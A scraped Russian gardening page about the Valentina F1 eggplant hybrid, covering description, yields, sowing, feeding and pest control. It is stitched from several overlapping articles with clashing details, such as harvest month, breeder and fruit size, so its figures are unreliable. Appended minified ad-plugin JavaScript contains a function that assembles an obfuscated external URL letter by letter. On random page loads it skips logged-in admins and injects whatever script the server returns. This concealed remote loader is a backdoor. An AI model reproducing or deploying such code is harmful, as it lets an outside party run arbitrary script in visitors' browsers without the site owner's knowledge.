5 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Баклажан валентина описание фото отзывы

Сорт баклажана Валентина (F1)

Овощные гибриды являются носителями лучших характеристик, поэтому спрос на них среди огородников так велик. Голландская компания Monsanto уже много лет разрабатывает растения с удивительными возможностями. Среди них — баклажан Валентина, зарегистрированный в 2005-ом году и включённый в Госреестр растений РФ в 2007-ом году. Сорт допущен к выращиванию во всех регионах России. Рекомендован для открытого грунта и плёночных укрытий в личных подсобных хозяйствах. Хорошо зарекомендовал себя в Молдове и Украине.

Описание

Растение открытого типа с хорошими ростовыми показателями. Кустик полураскидистый, высотой от среднего до высокого. В среднем рост составляет 85 — 90 см, но в теплице может быть выше метра. Стебель не слишком толстый, опушенный, со слабой антоциановой окраской. Междоузлия короткие. Листья обычного размера, ярко-зелёные, со слегка выемчатым краем и лёгкой волнистостью. Поверхность пластины жилковатая, шершавая на ощупь. Плодоножка у сорта длинная, не толстая. Цветок фиолетовый. Чашечка светло-зелёная, с редкими шипами или без них. Корневая система баклажана сильная.

Плоды у Валентины красивые, удлинённо-грушевидной или каплевидной формы с гладкой поверхностью. Длина 26 см, диаметр — 5 см. Обычный вес — 200 — 220 грамм. Кожица тонкая, крепкая и эластичная, сильноглянцевая, тёмно-фиолетового, иногда почти чёрного цвета. Мякоть белая или кремово-белая, достаточно плотная. На вкус мягкая и нежная, не содержит горечи. Семена или отсутствуют полностью, или содержаться в малом количестве, при этом они очень мягкие. Вкусовые качества отличные, мякоть имеет диетические свойства.

Характеристики сорта

  • Баклажан раннеспелый — с момента появления всходов до начала уборки проходит около 90 дней. Если высаживать рассаду, то спелость наступает ещё раньше — через 2 месяца. Урожай поспевает ко второй декаде июля;
  • урожайность на открытой грядке составляет 3,2 кг с 1 кв. метра. В Теплице, благодаря увеличенному периоду плодоношения, этот показатель может быть превышен в несколько раз;
  • спелый овощ имеет отличный внешний вид и высокие товарные качества;
  • одним из главных достоинств Валентины является высокая устойчивость к изменениям погодных условий. Даже если на улице дождливо и прохладно, цветки не опадут, а завязь продолжит формирование;
  • высокие товарные качества не теряются ни во время длительной транспортировки, ни в период хранения. В прохладных условиях баклажаны могут лежать целый месяц, не утрачивая вкусовых свойств;
  • устойчивость к болезням очень высокая, особенно хорошо сорт сопротивляется вирусу табачной мозаики;
  • способ употребления универсальный. Спелые плоды идеально подходят для приготовления закусок и горячих блюд. Из них можно приготовить в зиму множество вкуснейших заготовок.

Особенности агротехники

В тёплом климате семена Валентины можно высевать непосредственно в грунт. Посевной материал от производителя в дополнительной обработке не нуждается. Посадку можно осуществлять в начале мая. Если погода прохладная, посевы можно накрыть плёнкой.

Чтобы получить рассаду, семенной материал баклажанов высевают в конце февраля — начале марта. В теплицу или на грядку пересаживают сеянцы, имеющие не менее 4-х настоящих листочков. Если сорт предполагается выращивать на улице, то для успешной адаптации над грядкой с пересаженной рассадой устанавливают лёгкий плёночный парник. До полного укоренения молодые растения поливают часто — 1 раз в 3 — 4 дня.

Схема посадки — до 30 см расстояние между кустами в ряду, ширина междурядий — 60 — 70 см. Глубина посева семян Валентины — не более 1,5 см. Грядку лучше всего располагать на хорошо освещённом месте, укрытом от сквозняков.

В открытом грунте растения вырастают более коренастыми и в подвязке, как правило, не нуждаются. Но в закрытом грунте подвязка нужна обязательно. Уход за баклажаном несложный, заключается в своевременном поливе, подкормке и рыхлении почвы.

Валентина — прекрасный сорт для личных хозяйств. Он неприхотлив, устойчив к заболеваниям, переносит любую неблагоприятную погоду в период вегетации. Кроме того, разновидность славится высокой урожайностью и великолепными вкусовыми качествами. Недостатком является лишь необходимость покупки семян каждый год.

Баклажан Валентина F1

Благодаря селекционной работе на рынке семян баклажан постоянно появляются новые сорта. Баклажаны сорта Валентина F1 зарегистрированы в России в 2007 г. Выведены в голландской компании Монсанто. Этот гибрид, что характеризуется отменным вкусом, набирает популярность в среде огородников из-за раннего срока созревания и устойчивости к вирусам.

Характеристика гибрида

Баклажан Валентина F1 в условиях климата России выращивают в теплицах или под пленочными укрытиями. В южных областях кусты растут в открытом грунте. Гибрид Валентина отмечается устойчивостью к переменам погоды. Цветки в неблагоприятных условиях держатся на растении, не осыпаются, образуются завязи и плоды.

Симпатичные темно-фиолетовые длинные плоды баклажана оригинальными подвесками украшают куст гибрида уже на 60-70-й день после высадки на грядки. Самые первые, большие плоды можно срывать в июле. Урожай созревает через три месяца после появления всходов. С одного квадратного метра насаждений сорта Валентина собирают больше 3 кг овощей. Плоды баклажана Валентина F1 равномерны, славятся отличными товарными свойствами.

Плоды могут храниться приблизительно месяц в прохладном помещении, не теряя своих вкусовых качеств. Овощи используют для приготовления различных блюд и заготовок.

Важно выбрать момент кулинарной спелости баклажана. Обычно к этому времени плоды имеют насыщенный темный оттенок и глянцевый покров. Овощи с тусклой, немного побледневшей кожицей – переспелые, у них уже начинают формироваться мелкие твердые семена.

Описание растения

Кусты сорта Валентина – прямостоячие, сильнорослые, полураскидистые, поднимаются до 0,8-0,9 м. Ствол растения опушенный, отличается слабой светло-лиловой окраской. Среднего размера листья насыщенного зеленого оттенка, выемчатые по краям. Цветки большие, бело-фиолетовые.

Темно-фиолетовые плоды – удлиненные, каплевидной формы, могут вытянуться до 20-26 см. Диаметр утолщенной, нижней части плода – до 5 см, верхней – до 4 см. Масса плода достигает 200-250 г. Кожица глянцевая, тонкая, легко очищается. У плотной мякоти приятная кремово-белая окраска. В описаниях огородников, кто выращивал этот гибрид, отмечается мягкий и нежный вкус плодов, без намека на горечь.

Достоинства баклажана

В своих описаниях и отзывах овощеводы высоко оценивают качества плодов и самого растения сорта баклажана Валентина.

  • Скороплодность и урожайность;
  • Отличный вкус плодов и их товарный вид;
  • Неприхотливость растений;
  • Устойчивость к поражению вирусом табачной мозаики.

Выращивание гибрида

Приступают к высеву семян баклажан Валентина с начала марта. Обычно голландские семена продают уже покрытые специальными веществами после предпосевной обработки. Но в отзывах дачников встречаются упоминания о том, что после замачивания в стимуляторах роста семена гибрида всходили быстрее. Ускоряет всхожесть семян также замачивание в соке алоэ на полдня.

Затем семена подсушивают и проращивают.

  • Их помещают во влажные салфетки, вату или гидрогель и оставляют при температуре 25 0 С;
  • Проращенные семена гибрида аккуратно, с частью бумажной салфетки или крупинкой геля перекладывают в грунт торфяного горшочка или бумажного стаканчика.

Посев семян без проращивания

Для баклажанов гибрида Валентина надо подготовить питательную почву. Смешивают поровну землю с перегноем, торфом, опилками, обогащая состав древесной золой и карбамидом. Раствор готовят в пропорции 1 столовая ложка карбамида на 10 л воды. К глинистой почве добавляют песок.

  • Семена баклажана углубляют на 1-1,5 см, горшочки прикрывают пленкой или стеклом;
  • Температура для прорастания всходов должна быть на уровне 25-26 0 С;
  • Ростки появляются через 10 дней.

Уход за рассадой

На протяжении первых 15-20 дней молодая рассада баклажан требует, чтобы воздух прогревался до 26-28 0 С. Затем температура понижается днем на один градус, а ночью должна быть в пределах 15-16 градусов. Если погода пасмурная, дневную температуру следует поддерживать на уровне 23-25 0 С. При этом рассаду гибрида Валентина надо досвечивать – до 10 часов.

  • Воду для полива растений подогревают;
  • Почву увлажняют после подсыхания;
  • Для подкормок растений используют препарат «Кристалин». В 5 л воды растворяют 6-8 г удобрения.

Баклажаны в теплицах

В неотапливаемые теплицы и укрытия баклажаны Валентина высаживают во второй декаде мая. Следят, чтобы грунт прогрелся до 14-16 0 С. К этому времени рассада поднимается до 20-25 см, сформированы 5-7 настоящих листов.

  • Высаживая растения гибрида Валентина, придерживаются схемы 60 см х 40 см;
  • Поливать кусты баклажанов надо теплой водой 2-4 раза в неделю. После полива землю вокруг растений аккуратно разрыхляют, чтобы не повредить корешки;
  • Грунт желательно мульчировать;
  • Первую подкормку растений проводят через 3 недели после высадки. В 10 л теплой воды вливают 1 столовую ложку удобрения «Кемира универсал». Поливают по 0,5 л под корень;
  • Используют минеральные удобрения на выбор или органику: древесную золу, сброженный настой из луговых трав и сорняков, раствор навоза;
  • В конце июля просматривают все кусты баклажан, чтобы выбрать самые крупные завязи. Их оставляют, а другие удаляют, так же, как и цветы. Это делают для того, чтобы плоды быстрее созрели.

Теплицу надо проветривать, чтобы кусты баклажан не пострадали от высокой температуры. Благодаря своей устойчивости, растения гибрида Валентина сохраняют цветы и завязи, но плоды вырастают мелкие.

Баклажаны на огороде

На огород баклажаны Валентина выносят в конце мая или начале июня.

Выбирают хорошее солнечное место, где в прошлом году росли морковь, горох, фасоль, капуста, зеленные или бахчевые культуры. Эти растения считаются лучшими предшественниками для баклажанов.

  • При перекапывании грунт обогащают суперфосфатом, сульфатом калия, золой. Или добавляют перегной, компост;
  • К глинистой почве в большие лунки подсыпают песок. Баклажаны лучше развиваются на легких, но плодородных почвах;
  • Перед посадкой в почву вносят по выбору, сверяясь с инструкцией, такие удобрения, как «Рост», «Агро-прирост», «Кемира универсал» и другие;
  • Расстояние между рядами: 60-70 см, между растениями: 25-30 см;
  • Первые 7-10 дней саженцы баклажан Валентина нужно притенять, если стоит жаркая безоблачная погода. Кроме спанбонда, берут просторные картонные ящики, разбирая нижнюю плоскость, старые ведра без донышек и другие подручные материалы;
  • Растения поливают нагревшейся за день водой, утром грунт рыхлят и мульчируют.

Секреты овощеводов

Баклажаны гибрида Валентина – неприхотливая и устойчивая культура. Но следует знать накопленный опыт огородников, которые выращивали растения этого вида, чтобы получить хороший урожай.

  • После пересадки в теплицу растения первый раз поливают через 5 дней;
  • Под куст гибрида надо вылить 0,5-1 л воды, чтобы влага дошла до всех корешков растения;
  • Теплую воду льют под корень растения;
  • Рыхление должно быть поверхностным;
  • Для нормальной вегетации растениям требуется тепло до 28-30 градусов;
  • Когда начинают закладываться бутоны, баклажаны удобряют: в 10 л разводят 30-35 г аммиачной селитры и 25 г сульфата калия. Каждое растение получает не меньше 0,5 л раствора;
  • В период формирования завязей на участок с баклажанами вносят азотно-фосфорные удобрения в пропорции: 10 л воды:25 г суперфосфата:25 г калийной соли.

Как защитить баклажаны

От повышенной влажности баклажанам могут грозить грибковые заболевания.

  • Препараты «Антракнол» и «Квадрис» защитят растения от фитофторы;
  • «Хорус» – от серой гнили;
  • Для профилактики кусты баклажанов Валентина обрабатывают «Цирконом» или «Фитоспорином».

Вредители растений: колорадские жуки, паутинный клещ, тля и слизни.

  • На небольшом участке жуков собирают вручную;
  • Инсектицид «Стрела» применяют против клещей и тли;
  • Слизни уходят, если почва присыпана золой.

Труд на грядке с баклажанами принесет свои плоды уже в середине лета.

Овощи будут вкусным дополнением к столу.

Характеристика баклажана Валентина

Баклажан Валентина f1 относится к раннеспеющим сортам, их выращивают как в теплицах, так и в открытом грунте. Этот сорт славится своей высокой всхожестью, урожайностью и нежным, мягким вкусом плодов, а также средней устойчивостью к заболеваниям.

Характеристика баклажана Валентина

Описание сорта

Баклажан Валентина f1 – раннеспелый гибрид с высокой урожайностью. Семена производит голландская компания Seminis. В южных областях его урожайность увеличивается в разы, для высокой урожайности в местах с более прохладным летом этот сорт высаживают в теплицах.

  • урожай спеет в июне, примерно через 2 месяца после всходов;
  • мякоть почти без семян, плотная, белого цвета, отсутствует горечь;
  • стойкий иммунитет к различным заболеваниям;
  • при неблагоприятных условиях цветы и завязь не осыпаются.

Внешний вид куста и плода

Растение невысокое, до 85 см, не нуждается в подвязывании. Форма плодов каплевидная, продолговатая. Длинна 19-26 см, а диаметр 3-6 см, вес 250-300 г.

Цвет плода фиолетово-черный, а мякоть желтовато-белая, плотная. Этот сорт баклажанов отлично подходит для консервации, запекания, горячих и холодных закусок, пригодны для употребления в сыром виде из-за отсутствия горечи.

Посев семян

Чтобы вырастить сильные и здоровые баклажаны, требуется подготовить материал на посадку, для этого есть несколько способов:

  1. Замочить их в растворе перекиси водорода для обеззараживания семян. Эту процедуру стоит проводить за сутки до посева, а раствор готовить сразу перед использованием. В стакан с теплой водой, примерно 40˚С, добавить 5-6 мл перекиси и замочить семена не более, чем на 15 минут.
  2. Прорастить семена. Создаются благоприятные условия: температура воздуха около 25˚ и повышенная влажность. Семена заворачивают в хлопчатобумажную, влажную ткань и помещают в теплое место, а после того, как семена проросли, высажавают их в торфяные горшки.

Высадка в землю

Рассаду следует высаживать в прогретую почву

Высаживать рассаду баклажанов сорта Валентина лучше в мае, когда земля прогреется до 14˚ и выше. Место под посадку выбирают хорошо проветриваемое и освещенное, а также подготовить почву.

Для наиболее обильного урожая их высаживают там, где ранее росли бобовые, бахчевые или зеленые культуры. При перекопке земли имеет смысл внести суперфосфат, калийный сульфат и древесную золу. Требуется использовать пред посадочные внесения Агро-прироста, Кемиры универсал и Растворина. Рассаду высаживают, когда стебли достигли высоты 20-25 см и у них в наличии 6-7 листочков.

На подготовленном участке земли делают лунки, глубиной 15-20 см, расстояние между саженцами примерно 40 см, междурядье 55-60 см и перед высадкой вливают 1 кружку теплой воды. Высаживать рассаду желательно с неразрушенным земляным комом, присыпать каждый кустик землей, уплотнить ее и вылить под каждый куст 400-500 мл теплой воды.

Уход за растением

Согласно описанию, это растение неприхотливо, из-за формы и размера не нуждается в подвязке. После высадки их необходимо полить через 5 дней. Растение следует поливать обильно, под корень и желательно в утреннее время. После высадки первый раз подкормить растение можно через неделю раствором Кемира-люкс.

Во время появления бутонов подкармливают куст фосфорно-калийным удобрением, а во время завязи плодов подойдут азотно-фосфатные удобрения или раствор на основе древесной золы и коровяка. После полива или дождя нужно вспушить грядку. Под каждое растение нужно вливать 2-5 л вещества.

Болезни и вредители

Чтобы предотвратить многие заболевания, свойственные пасленовым, следует соблюдать схему профилактики для защиты от болезней и вредителей. От фитофторы растение обрабатывают Квадрисом или Антраколом, а Хорусом для защиты от серой гнили.

На паслёновые часто нападает колорадский жук, но у него уже появился иммунитет ко многим ядам, поэтому желательно собирать их вручную – так есть шанс уберечь растение и не наполнить плоды вредными веществами. Соблюдение превентивных мер поспособствует хорошему урожаю и отсутствию различных заболеваний.

Баклажан Валентина f1: описание сорта, секреты хорошего урожая, отзывы и видео

Баклажаны Валентина f1 – гибридный вид, адаптированный под выращивание в теплицах, в средней полосе России. Как показывают отзывы огородников, плоды этого сорта отличаются высокими показателями урожайности и всхожести, а так же мягким вкусом. Описание и фото баклажан Валентина f1, которые представлены в нашей статье, доказывают насколько это неприхотливое и устойчивое к вирусам растение.

Описание сорта

Баклажан Валентина f1, относится к категории раноспеющих, пригоден для выращивания как в теплицах, так и в отрытом грунте. Первый урожай уже может появиться спустя 60 дней после высадки. Кусты баклажана Валентина F1 имеют среднераскидное, высокое строение. Размер листьев в теплицах достигает до 1 м, а в естественном грунте до 80 см. Спелые плоды можно описать следующим образом:

  • форма: грушевидная, удлиненная;
  • цвет: темно-фиолетовый;
  • вес: 250-300 гр.;
  • длина спелого плода 19-26 см, диаметром 3-6 см;
  • мякоть желтовато-белая, без горечи.

Этот сорт баклажан пользуется большой популярностью на рынке, в первую очередь из-за своих вкусовых характеристик (не горчит) и неприхотливостью при выращивании.

Внимание! С 1 м² грядки можно получить около 3 кг свежих баклажан.

Как правильно высаживать

Семена «Валентина f1» продаются во всех специализированных магазинах.

  1. Перед посадкой зернам нужно дать прорости, для этого нужно создать теплые (более +25С) и влажные условия. Для этого, можно завернуть семена в натуральную хлопчатобумажную ткань, поместить в теплое место, при этом каждый день (или по мере высыхания) сбрызгивать водой.
  2. Проросший посевной материал пересаживают в торфяные горшочки в марте.
  3. Высаживать семена лучше всего в середине мая, когда температура почвы прогреется хотя бы до 14C. Для этого сначала нужно выкопать ямки, глубина которых будет зависеть от размера саженца, в среднем это 16-26 см.
  4. Молодые побеги аккуратно вытаскивают из горшочков и пересаживают в лунки, а затем аккуратно засыпают грунтом.
  5. Затем саженцы обильно поливаются водой, из расчета 0,5 л воды на одну клумбу.
  6. После этого землю перекапывают, выравнивают и утрамбовывают.

Уход за баклажаном Валентина

После посадки, первый раз полить овощи можно через пять дней. Баклажаны Валентина f1 не переносят чрезмерной сырости. Поэтому орошать землю достаточно 2-4 раза в неделю. Вода для полива должна быть отстоявшаяся, температурой 26-28 C. После орошения, верхний грунт необходимо разрыхлить.

Идеальные условия для роста баклажан: температура 28-30C, влажность не выше 70%.

В жаркие дни, если баклажаны растут вне теплицы, то землю после полива нужно сначала разрыхлить, а затем покрыть ее мульчей (солома, древесные опилки).

Первую подкормку растениям нужно вводить через 20 дней после пересадки в грунт. В качестве подкормки можно использовать готовый раствор «Кемира» (1 ч.л. на 5 л воды) или натуральные добавки (коровий навоз, древесная зола, настой трав).

Совет! Лучше всего чередовать натуральные и минеральные добавки.

Первый урожай можно собирать через 60-70 дней после пересадки, когда средний вес плода станет 200 гр.

Советы профессионалов

  1. Лучшей землей для баклажан станет смесь торфа, компоста, перепревшего навоза и песка с землей вашего региона.
  2. Чтобы повысить урожайность, землю после посадки удобряют смесью золы с мочевиной (1 ч.л. на 5 л воды) и сульфатом калия (1 ч.л. на 5 л воды).
  3. Нельзя удобрять баклажаны свежим навозом, это может испортить корневую систему куста.
  4. Молодые кусты нужно высаживать на расстоянии 40 см друг от друга по ряду, и 50 см относительно рядов.
  5. Если баклажаны высаживаются в глинистый грунт, то в почву обязательно нужно добавить крупный песок.

Отзывы садоводов

В интернете можно найти массу положительных отзывов, подтверждающих урожайность и неповторимый вкус этого сорта баклажан. Как уверяют многие хозяйки, эти баклажаны прекрасно подходят для консервации. Они совсем не горчат, быстро готовятся и практически не имеют внутри семян. Что немаловажно, этот сорт отлично приживается в тепличных условиях и устойчив к любым вирусам.

Среди негативных отзывов можно выделить то, что при длительном и не правильном хранении семян показатель всхожести будет низким.

Таким образом, баклажан «Валентина f1», можно смело назвать одним из самых неприхотливых овощей, который под силу вырастить любому садоводу-любителю. Но имейте в виду, что этот овощ очень не любит низкие температуры и чрезмерный полив.

Подготовка семян баклажана к посадке — видео

Баклажан Валентина: описание сорта, фото, отзывы, характеристика, урожайность, достоинства и недостатки

Описание сорта

Характеристика плодов

Далее представлены фото баклажанов сорта Валентина :





Достоинства и недостатки

У этого сорта баклажанов есть свои достоинства, среди которых можно выделить основные:

Применение

Особенности выращивания

Посмотрите видео! Cорт баклажана Валентина

Отзывы, кто сажал

Ниже приведены отзывы тех, кто сажал баклажан Валентина . Прочитав их, вы поймете все достоинства сорта и секреты его выращивания.

Юрий, г.Москва

Наталья, г.Нижний Новгород

Марина, г.Уфа

Александр, г.Сарапул

Дина, г.Самара

Виктория, г.Казань

Ольга, г.Санкт-Петербург

Жанна, г.Казань

Если статья была полезна, поставь 5 звездочек!

(Пока оценок нет)
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};